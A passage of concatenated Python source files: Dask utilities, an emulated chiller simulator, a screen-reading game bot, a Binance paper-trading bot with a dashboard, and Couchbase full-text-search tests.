inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
is_server_extension = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
is_server_extension = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not is_server_extension:
is_kernel_and_no_running_loop = False
if is_kernel():
try:
asyncio.get_running_loop()
except RuntimeError:
is_kernel_and_no_running_loop = True
if not is_kernel_and_no_running_loop:
# TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below,
# once tornado > 6.0.3 is available.
if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"):
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
# https://github.com/tornadoweb/tornado/issues/2608
BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy
else:
BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy
class AnyThreadEventLoopPolicy(BaseEventLoopPolicy):
def get_event_loop(self):
try:
return super().get_event_loop()
except (RuntimeError, AssertionError):
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = set(
[
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
]
)
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
@functools.lru_cache(None)
def iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def typename(typ):
"""Return name of type
Examples
--------
>>> from distributed import Scheduler
>>> typename(Scheduler)
'distributed.scheduler.Scheduler'
"""
try:
return typ.__module__ + "." + typ.__name__
except AttributeError:
return str(typ)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
[8787]
or a string:
>>> parse_ports("8787")
[8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
[8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
[None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"port_start={port_start} and port_stop={port_stop}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
"""A container for logs"""
def _repr_html_(self):
return "<pre><code>\n{log}\n</code></pre>".format(
log=html.escape(self.rstrip())
)
class Logs(dict):
"""A container for multiple logs"""
def _repr_html_(self):
summaries = [
"<details>\n"
"<summary style='display:list-item'>{title}</summary>\n"
"{log}\n"
"</details>".format(title=title, log=log._repr_html_())
for title, log in sorted(self.items())
]
return "\n".join(summaries)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (i.e., arguments that
are not part of Worker class), such as nprocs from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
"Class %s does not support keyword %s" % (typename(cls), k)
)
else:
raise ValueError(
"Module %s does not support keyword %s" % (typename(cmd), k)
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
[["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin") # doctest: +SKIP
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
def clean_dashboard_address(addrs: Any, default_listen_ip: str = "") -> List[Dict]:
"""
Examples
--------
>>> clean_dashboard_address(8787)
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address(":8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("foo:8787")
[{'address': 'foo', 'port': 8787}]
>>> clean_dashboard_address([8787, 8887])
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
>>> clean_dashboard_address(":8787,:8887")
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
if isinstance(addrs, str):
addrs = addrs.split(",")
if not isinstance(addrs, list):
addrs = [addrs]
addresses = []
for addr in addrs:
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
addresses.append({"address": host, "port": port})
return addresses
|
emulated_chiller_heatpump.py
|
from pyfmi import load_fmu
import yaml
import numpy as np
import asyncio
from flask import Flask, jsonify
import threading
from flexlab.db_layer import db_interface
import datetime
import pytz
import pandas as pd
class Emulated_Chiller_Heatpump:
def __init__(self, config_file='flexlab/models/chiller_heatpump_fmu_1b/chiller_config.yaml'):
with open(config_file) as fp:
self.config = yaml.safe_load(fp)
self._default_setpoint = self.config.get('default_setpoint', 44)
# min setpoint: 2C or 35.6F
self._min_setpoint = self.config.get('min_setpoint', 35.6)
self._max_setpoint = self.config.get('max_setpoint')
self.fmu_file = self.config.get('fmu_file')
self.chiller = load_fmu(self.fmu_file)
self.setpoint_table = self.config.get('setpoint_table')
self.cell = self.config.get('cell')
self.model_options = self.chiller.simulate_options()
self.model_options['initialize'] = True
self._model_update_rate = self.config.get('model_update_rate', 30)
self.model_options['CVode_options']['rtol'] = 1e-6
self.model_options['CVode_options']['atol'] = 1e-8
self.chiller_db = db_interface.DB_Interface()
self.current_time = 0
self.initialize_chiller_model()
self.app = Flask('emulated_chiller')
self.app.add_url_rule('/get_data', 'get_data', self.get_readings)
self.web_api_port = self.config.get('web_api_port', 5003)
self.loop = asyncio.get_event_loop()
self.schedule_tasks()
def initialize_chiller_model(self):
end_t = datetime.datetime.now(pytz.timezone('US/Pacific'))
start_t = end_t - datetime.timedelta(minutes=5)
chiller_values = self.chiller_db.get_latest_chiller_points(st = start_t, et = end_t, cell=self.cell).to_dict('records')[0]
chiller_values_SI_units = self.convert_units(chiller_values)
inputs = (
['m_flow_sec', 'T_chw_in', 'chiOn', 'T_air_in'],
np.array(
[[0, chiller_values_SI_units.get('m_flow_sec'), chiller_values_SI_units.get('T_chw_in'), chiller_values_SI_units.get('chiOn'), chiller_values_SI_units.get('T_air_in')],
[30, chiller_values_SI_units.get('m_flow_sec'), chiller_values_SI_units.get('T_chw_in'), chiller_values_SI_units.get('chiOn'), chiller_values_SI_units.get('T_air_in')]]
)
)
self.chiller.simulate(0, 30, inputs, options=self.model_options)
self.model_options['initialize'] = False
self.current_time = 30
def convert_units(self, chiller_values):
chiller_values_SI_units = {}
for key in chiller_values:
if key.endswith('-CHWFM-2'):
chiller_values_SI_units['m_flow_sec'] = chiller_values[key] * 0.000017 * 997
elif key.endswith('CHWRTS-2'):
chiller_values_SI_units['T_chw_in'] = chiller_values[key] + 273.15
elif key.endswith('CHWP-VFD-STAT'):
chiller_values_SI_units['chiOn'] = int(chiller_values[key]) == 1
elif key.endswith('OAT-1'):
chiller_values_SI_units['T_air_in'] = chiller_values[key] + 273.15
return chiller_values_SI_units
def schedule_tasks(self):
self.loop.create_task(self._periodic_advance_time())
async def _periodic_advance_time(self):
while True:
print("current time == {}".format(self.current_time))
start = self.current_time
end = self.current_time + self._model_update_rate
end_t = datetime.datetime.now(pytz.timezone('US/Pacific'))
start_t = end_t - datetime.timedelta(minutes=5)
chiller_values = self.chiller_db.get_latest_chiller_points(st=start_t, et=end_t, cell=self.cell).to_dict('records')[0]
chiller_values_SI_units = self.convert_units(chiller_values)
if chiller_values_SI_units.get('m_flow_sec') < 0:
chiller_values_SI_units['m_flow_sec'] = 0
inputs = (
['m_flow_sec', 'T_chw_in', 'chiOn', 'T_air_in'],
np.array(
[[start, chiller_values_SI_units.get('m_flow_sec'), chiller_values_SI_units.get('T_chw_in'), chiller_values_SI_units.get('chiOn'), chiller_values_SI_units.get('T_air_in')],
[end, chiller_values_SI_units.get('m_flow_sec'), chiller_values_SI_units.get('T_chw_in'), chiller_values_SI_units.get('chiOn'), chiller_values_SI_units.get('T_air_in')]]
)
)
self.chiller.simulate(start, end, inputs, options=self.model_options)
latest_chiller_setpoint = self.chiller.get('T_chw_out')[0]
if chiller_values_SI_units['m_flow_sec'] >= 0.005:
self.push_setpoint_to_db(latest_chiller_setpoint)
self.current_time = self.current_time + self._model_update_rate
await asyncio.sleep(self._model_update_rate)
def push_setpoint_to_db(self, setpoint):
variable_name = self.cell + '_chiller_heatpump_primary_sp_K_command'
action_dict = {variable_name: setpoint}
action_df = pd.DataFrame.from_records(action_dict, index=[0])
self.chiller_db.push_setpoints_to_db(cell=self.cell, df=action_df, table=self.setpoint_table)
def get_readings(self):
measurements = {
self.cell+'_m_flow_sec': self.chiller.get('m_flow_sec')[0],
self.cell+'_T_chw_in': self.chiller.get('T_chw_in')[0],
self.cell+'_chiOn': bool(self.chiller.get('chiOn')[0]),
self.cell+'_T_air_in': self.chiller.get('T_air_in')[0],
self.cell+'_T_chw_out': self.chiller.get('T_chw_out')[0],
self.cell+'_T_pch_in': self.chiller.get('T_pch_in')[0],
self.cell+'_chi_P': self.chiller.get('chi_P')[0],
self.cell+'_pum_P': self.chiller.get('pum_P')[0],
self.cell+'_m_flow_pri': self.chiller.get('m_flow_pri')[0],
self.cell+'_chi_spd': self.chiller.get('chi_spd')[0],
self.cell+'_chi_COP': self.chiller.get('chi_COP')[0]
}
print(measurements)
return jsonify(measurements)
def run(self):
self.app.run('0.0.0.0', port=self.web_api_port)
def main():
try:
loop = asyncio.get_event_loop()
chiller = Emulated_Chiller_Heatpump()
threading.Thread(target=chiller.run).start()
loop.run_forever()
except KeyboardInterrupt:
print('Stopping event loop')
loop.stop()
if __name__ == "__main__":
main()
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import threading
import os
import time
from timeit import default_timer as timer
# pip install opencv-python
import cv2
import numpy as np
import pyautogui
import keyboard
from common import get_logger, get_current_datetime_str, find_rect_contours
def filter_button(rect):
x, y, w, h = rect
# TODO: эффективнее для разных разрешений сравнивать процентно, а не пиксельно
rule_1 = w > 30 and h > 30
rule_2 = w > h
# У кнопок ширина больше высоты
return rule_1 and rule_2
def filter_fairy(rect):
x, y, w, h = rect
# TODO: эффективнее для разных разрешений сравнивать процентно, а не пиксельно
# У феи ширина и высота больше определенной цифры
rule_1 = w > 20 and h > 20
# У феи высота больше ширины
rule_2 = h > w
# Фея приблизительно по центру экрана летает
rule_3 = y > 300 and y < 900
return rule_1 and rule_2 and rule_3
def filter_fairy_and_button(rect_fairy, rect_button):
x, y = rect_fairy[:2]
x2, y2, _, h2 = rect_button
# TODO: эффективнее для разных разрешений сравнивать процентно, а не пиксельно
return abs(x2 - x) <= 50 and abs(y2 + h2 - y) <= 50
def save_screenshot(prefix, img_hsv):
file_name = DIR + '/{}__{}.png'.format(prefix, get_current_datetime_str())
log.debug(file_name)
cv2.imwrite(file_name, cv2.cvtColor(np.array(img_hsv), cv2.COLOR_HSV2BGR))
log = get_logger('Bot Buff Knight Advanced')
DIR = 'saved_screenshots'
if not os.path.exists(DIR):
os.mkdir(DIR)
BLUE_HSV_MIN = 105, 175, 182
BLUE_HSV_MAX = 121, 255, 255
ORANGE_HSV_MIN = 7, 200, 200
ORANGE_HSV_MAX = 20, 255, 255
FAIRY_HSV_MIN = 73, 101, 101
FAIRY_HSV_MAX = 95, 143, 255
RUN_COMBINATION = 'Ctrl+Shift+R'
QUIT_COMBINATION = 'Ctrl+Shift+Q'
AUTO_ATTACK_COMBINATION = 'Space'
BOT_DATA = {
'START': False,
'AUTO_ATTACK': False,
}
def change_start():
BOT_DATA['START'] = not BOT_DATA['START']
log.debug('START: %s', BOT_DATA['START'])
def change_auto_attack():
BOT_DATA['AUTO_ATTACK'] = not BOT_DATA['AUTO_ATTACK']
log.debug('AUTO_ATTACK: %s', BOT_DATA['AUTO_ATTACK'])
log.debug('Press "%s" for RUN / PAUSE', RUN_COMBINATION)
log.debug('Press "%s" for QUIT', QUIT_COMBINATION)
log.debug('Press "%s" for AUTO_ATTACK', AUTO_ATTACK_COMBINATION)
def process_auto_attack():
while True:
if not BOT_DATA['START']:
time.sleep(0.01)
continue
# Симуляция атаки
if BOT_DATA['AUTO_ATTACK']:
pyautogui.typewrite('C')
time.sleep(0.01)
def process_find_fairy(img_hsv):
rects_blue = find_rect_contours(img_hsv, BLUE_HSV_MIN, BLUE_HSV_MAX)
rects_orange = find_rect_contours(img_hsv, ORANGE_HSV_MIN, ORANGE_HSV_MAX)
rects_fairy = find_rect_contours(img_hsv, FAIRY_HSV_MIN, FAIRY_HSV_MAX)
# Фильтрование оставшихся объектов
rects_blue = list(filter(filter_button, rects_blue))
rects_orange = list(filter(filter_button, rects_orange))
rects_fairy = list(filter(filter_fairy, rects_fairy))
# Фильтр объектов, похожих на фею
if rects_blue or rects_orange:
new_rects_fairy = []
# Фея и кнопки находятся рядом, поэтому имеет смысл убрать те "феи", что не имеют рядом синих или оранжевых
for rect_fairy in rects_fairy:
found_blue = bool(list(filter(lambda rect: filter_fairy_and_button(rect_fairy, rect), rects_blue)))
found_orange = bool(list(filter(lambda rect: filter_fairy_and_button(rect_fairy, rect), rects_orange)))
# Если возле феи что-то нашлось
if found_blue or found_orange:
new_rects_fairy.append(rect_fairy)
rects_fairy = new_rects_fairy
if not rects_fairy:
return
if len(rects_fairy) > 1:
save_screenshot('many_fairy', img_hsv)
return
# Фильтр кнопок. Нужно оставить только те кнопки, что рядом с феей
rect_fairy = rects_fairy[0]
rects_blue = list(filter(lambda rect: filter_fairy_and_button(rect_fairy, rect), rects_blue))
rects_orange = list(filter(lambda rect: filter_fairy_and_button(rect_fairy, rect), rects_orange))
# Если одновременно обе кнопки
if rects_blue and rects_orange:
save_screenshot('many_buttons', img_hsv)
return
if not rects_blue and not rects_orange:
return
# Найдена синяя кнопка
if rects_blue:
log.debug('FOUND BLUE')
save_screenshot('found_blue', img)
pyautogui.typewrite('D')
# Найдена оранжевая кнопка
if rects_orange:
log.debug('FOUND ORANGE')
save_screenshot('found_orange', img)
pyautogui.typewrite('A')
if __name__ == '__main__':
keyboard.add_hotkey(QUIT_COMBINATION, lambda: log.debug('Quit by Escape') or os._exit(0))
keyboard.add_hotkey(AUTO_ATTACK_COMBINATION, change_auto_attack)
keyboard.add_hotkey(RUN_COMBINATION, change_start)
# Запуск потока для автоатаки
thread_auto_attack = threading.Thread(target=process_auto_attack)
thread_auto_attack.start()
while True:
if not BOT_DATA['START']:
time.sleep(0.01)
continue
t = timer()
try:
img_screenshot = pyautogui.screenshot()
log.debug('img_screenshot: %s', img_screenshot)
img = cv2.cvtColor(np.array(img_screenshot), cv2.COLOR_RGB2HSV)
# Поиск феи
process_find_fairy(img)
# TODO: возможность автоматического использования хилок и восстановления маны
finally:
log.debug(f'Elapsed: {timer() - t} secs')
time.sleep(0.01)
|
live.py
|
#standard libraries
import time
from datetime import datetime
import csv
import os
import json
from concurrent import futures
import threading
import multiprocessing
import math
#external libraries
import numpy as np
import pandas as pd
from discord import Webhook, RequestsWebhookAdapter
from binance.client import Client
from binance.enums import *
from matplotlib import pyplot as plt
#dash imports
import dash
import dash_html_components as html
import dash_core_components as dcc
from dash.dependencies import Input, Output
import plotly.express as px
import plotly.graph_objects as go
#file imports
from database import LiveDataBase
from actor import NNActor
from utils import read_json, read_config, timer
class Gui():
def __init__(self, hook):
#data setup
self.hook = hook
#app setup
self.app = dash.Dash(__name__)
title = html.Div(id="title", children=[html.H1(f"Trading {self.hook.ldb.symbol}, on the {self.hook.ldb.market_endpoint} market")])
profit = html.Div(id="profit")
live_graph = html.Div(id="live-graph-wrapper")
interval = dcc.Interval(id='interval', interval=1*1000, n_intervals=0)
self.app.layout = html.Div(children=[title, profit, live_graph, interval])
@self.app.callback(Output('live-graph-wrapper', 'children'),
Input('interval', 'n_intervals'))
def update_live_graph(n):
#get the data
data = self.hook.actionlog.get_data_frame(self.hook.ldb.data.iloc[:-1,:])
#create the figure
fig = go.Figure()
fig.add_trace(go.Scatter(x=data["close_time"], y=data["close"], mode="lines", name="close price", line=dict(color="black")))
fig.add_trace(go.Scatter(x=data["close_time"], y=data["hold"], mode="markers", name="hold", line=dict(color="gray")))
fig.add_trace(go.Scatter(x=data["close_time"], y=data["buy"], mode="markers", name="buy", line=dict(color="green")))
fig.add_trace(go.Scatter(x=data["close_time"], y=data["sell"], mode="markers", name="sell", line=dict(color="red")))
return dcc.Graph(id="live-graph", figure=fig)
@self.app.callback(Output('profit', 'children'),
Input('interval', 'n_intervals'))
def update_profit(n):
#get the specific profit
specific_profit = self.hook.broker.specific_profit
return html.H2(f"Specific Profit since start: {specific_profit}")
def run(self):
self.app.run_server(host="0.0.0.0", debug=False, dev_tools_silence_routes_logging=True)
class ActionLog():
def __init__(self, size=200):
self.size = size
#action memory
self.action = [np.nan]*self.size
#actual price memory
self.actual_price = [np.nan]*self.size
def append(self, action, actual_price):
#save the action
if action is None:
self.action.append(np.nan)
elif action == 0 or action == 1 or action == 2:
self.action.append(action)
else:
raise Exception(f"Your chosen action {action} is not valid!")
#save the actual price
if actual_price is None:
self.actual_price.append(np.nan)
else:
self.actual_price.append(actual_price)
#cut the first elements off
self.action.pop(0)
self.actual_price.pop(0)
def get_data_frame(self, df):
data = df[["close_time", "close"]].copy()
#set the length
length = data.shape[0]
if length > self.size:
length = self.size
#shorten the data
data = data.iloc[-length:,:]
#add the actions
data["action"] = np.array(self.action[-length:])
#add the action prices
data["hold"] = np.nan
data.loc[data["action"] == 0, "hold"] = data.loc[data["action"] == 0, "close"]
data["buy"] = np.nan
data.loc[data["action"] == 1, "buy"] = data.loc[data["action"] == 1, "close"]
data["sell"] = np.nan
data.loc[data["action"] == 2, "sell"] = data.loc[data["action"] == 2, "close"]
#add the actual prices
data["actual_price"] = np.array(self.actual_price[-length:])
#reset the index
data.reset_index(inplace=True, drop=True)
return data
class Broker():
def __init__(self, symbol, testing=True, config_path=None):
#save/create neccessary variables
self.symbol = symbol
self.testing = testing
self.profit = 0
self.specific_profit = 0
self.mode = "buy"
#load in the config
self.config = read_config(path=config_path)
#create the client
self.client = Client(api_key=self.config["binance"]["key"], api_secret=self.config["binance"]["secret"])
"""
Testnet:
self.client = Client(api_key=self.config["binance"]["key_testnet"], api_secret=self.config["binance"]["secret_testnet"])
self.client.API_URL = "https://testnet.binance.vision/api"
order = self.client.create_order(symbol="ETHUSDT", side=SIDE_SELL, type=ORDER_TYPE_MARKET, quantity=2)
print(order)
print(self.client.get_asset_balance(asset="ETH"))
print(self.client.get_asset_balance(asset="USDT"))
"""
def _get_current_price(self):
market_endpoint = self.config["binance"]["market_endpoint"]
if market_endpoint == "spot":
price_dict = self.client.get_symbol_ticker(symbol=self.symbol)
price = price_dict["price"]
elif market_endpoint == "futures":
price_dict = self.client.futures_symbol_ticker(symbol=self.symbol)
price = price_dict["price"]
else:
raise Exception(f"Your chosen market endpoint: {market_endpoint} is not available, change in config.json")
print(price)
return float(price)
def buy(self, amount):
if self.testing:
return self._test_buy(amount=amount)
raise Exception("Real buying has not been implemented yet")
return
def _test_buy(self, amount):
if self.mode == "buy":
#get the current price
price = self._get_current_price()
#set as buyprice
self.buy_price = price
self.mode = "sell"
else:
return
def sell(self):
if self.testing:
return self._test_sell()
raise Exception("Real selling has not been implemented yet")
def _test_sell(self):
if self.mode == "sell":
#get the current price
price = self._get_current_price()
#calculate profit
specific_profit = price/self.buy_price * (1-0.00075)**2 - 1
#add to specific profit count
self.specific_profit += specific_profit
self.mode = "buy"
else:
return
def trade(self, action, amount):
if action == 0:
return
elif action == 1:
self.buy(amount=amount)
elif action == 2:
self.sell()
else:
raise Exception(f"Your chosen action: {action} is not valid")
class Bot():
def __init__(self, symbol, run_path, actor, config_path=None):
#save the variables
self.symbol = symbol
self.run_path = run_path
self.info_path = self.run_path + "/info.json"
self.config_path = config_path
#config dictionary
self.config = read_config(path=config_path)
#info dictionary
self.info = read_json(path=self.info_path)
#setup the ldb
self.ldb = LiveDataBase(symbol=self.symbol, run_path=self.run_path, config_path=self.config_path)
#save the actor
self.actor = actor
#setup the actionlog
self.actionlog = ActionLog(size=100)
#setup the broker
self.broker = Broker(symbol=self.symbol, testing=True)
#setup the gui
self.gui = Gui(hook=self)
def update(self):
start = time.time()
#setup discord webhooks
webhook = Webhook.partial(self.config["discord"]["webhook_id"], self.config["discord"]["webhook_token"], adapter=RequestsWebhookAdapter())
prec_webhook = Webhook.partial(self.config["discord"]["prec_webhook_id"], self.config["discord"]["prec_webhook_token"], adapter=RequestsWebhookAdapter())
#update our ldb
try:
self.ldb.update_data()
except Exception as e:
print("Unsuccesfull ldb update resetting and conducting no action!")
print("Exception: ", e)
#reset our database
self.ldb = LiveDataBase(symbol=self.symbol, run_path=self.run_path, config_path=self.config_path)
#save no action
self.actionlog.append(action=None, actual_price=None)
#end the update method
return
#get the new state
state = self.ldb.get_state()
#get the action for that new state
action = self.actor.get_action(state)
#do something with this action
self.broker.trade(action=action, amount=1000)
#save the action
self.actionlog.append(action=action, actual_price=100)
#calculate update duration
duration = time.time()-start
print(f"Update took {round(duration,2)} seconds")
def run(self):
#startup the gui
gui_thread = threading.Thread(target=self.gui.run)
gui_thread.start()
#main loop
while True:
#wait for time to get to candlestick_interval
timer(candlestick_interval=self.info["candlestick_interval"])
#wait a little time
time.sleep(2)
#update the coins
self.update()
gui_thread.join()
if __name__ == "__main__":
from pretrain import Network
#load in the actor
Actor = NNActor(neural_network=Network, load_path="./experiments/testeth2/Run1", epoch=0)
bot = Bot(symbol="ETHUSDT", run_path="./experiments/testeth2/Run1", actor=Actor)
bot.run()
|
stable_topology_fts.py
|
# coding=utf-8
import copy
import json
import random
from threading import Thread
import Geohash
from membase.helper.cluster_helper import ClusterOperationHelper
from remote.remote_util import RemoteMachineShellConnection
from TestInput import TestInputSingleton
from fts_base import FTSBaseTest
from lib.membase.api.exception import FTSException, ServerUnavailableException
from lib.membase.api.rest_client import RestConnection
class StableTopFTS(FTSBaseTest):
def setUp(self):
super(StableTopFTS, self).setUp()
def tearDown(self):
super(StableTopFTS, self).tearDown()
def check_fts_service_started(self):
try:
rest = RestConnection(self._cb_cluster.get_random_fts_node())
rest.get_fts_index_definition("invalid_index")
except ServerUnavailableException as e:
raise FTSException("FTS service has not started: %s" %e)
def create_simple_default_index(self):
plan_params = self.construct_plan_params()
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items/2)
self.create_fts_indexes_all_buckets(plan_params=plan_params)
if self._update or self._delete:
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
def test_index_docvalues_option(self):
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.load_data()
self.wait_for_indexing_complete()
if float(self.get_zap_docvalue_disksize()) != float(0):
self.fail("zap files size with docvalue not empty with docValues = False")
else:
self.log.info(" zap files size found to be : {0}".format(self.get_zap_docvalue_disksize()))
index.update_docvalues_email_custom_index(True)
self.wait_for_indexing_complete()
if float(self.get_zap_docvalue_disksize()) == float(0):
self.fail("zap files size with docvalue found to be empty with docValues = True")
else:
self.log.info(" zap files size found to be : {0}".format(self.get_zap_docvalue_disksize()))
def test_maxttl_setting(self):
self.create_simple_default_index()
maxttl = int(self._input.param("maxttl", None))
self.sleep(maxttl,
"Waiting for expiration at the elapse of bucket maxttl")
self._cb_cluster.run_expiry_pager()
self.wait_for_indexing_complete(item_count=0)
self.validate_index_count(must_equal=0)
for index in self._cb_cluster.get_indexes():
query = eval(self._input.param("query", str(self.sample_query)))
hits, _, _, _ = index.execute_query(query,
zero_results_ok=True,
expected_hits=0)
self.log.info("Hits: %s" % hits)
def query_in_dgm(self):
self.create_simple_default_index()
for index in self._cb_cluster.get_indexes():
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def run_default_index_query(self, query=None, expected_hits=None, expected_no_of_results=None):
self.create_simple_default_index()
zero_results_ok = True
if not expected_hits:
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
if not query:
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
if expected_no_of_results is None:
expected_no_of_results = self._input.param("expected_no_of_results", None)
for index in self._cb_cluster.get_indexes():
hits, matches, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
expected_no_of_results=expected_no_of_results)
self.log.info("Hits: %s" % hits)
self.log.info("Matches: %s" % matches)
def test_query_type(self):
"""
uses RQG
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
def test_query_type_on_alias(self):
"""
uses RQG
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
alias = self.create_alias([index])
self.generate_random_queries(alias, self.num_queries, self.query_types)
self.run_query_and_compare(alias)
def test_match_all(self):
self.run_default_index_query(query={"match_all": {}},
expected_hits=self._num_items)
def test_match_none(self):
self.run_default_index_query(query={"match_none": {}},
expected_hits=0)
def test_match_consistency(self):
query = {"match_all": {}}
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
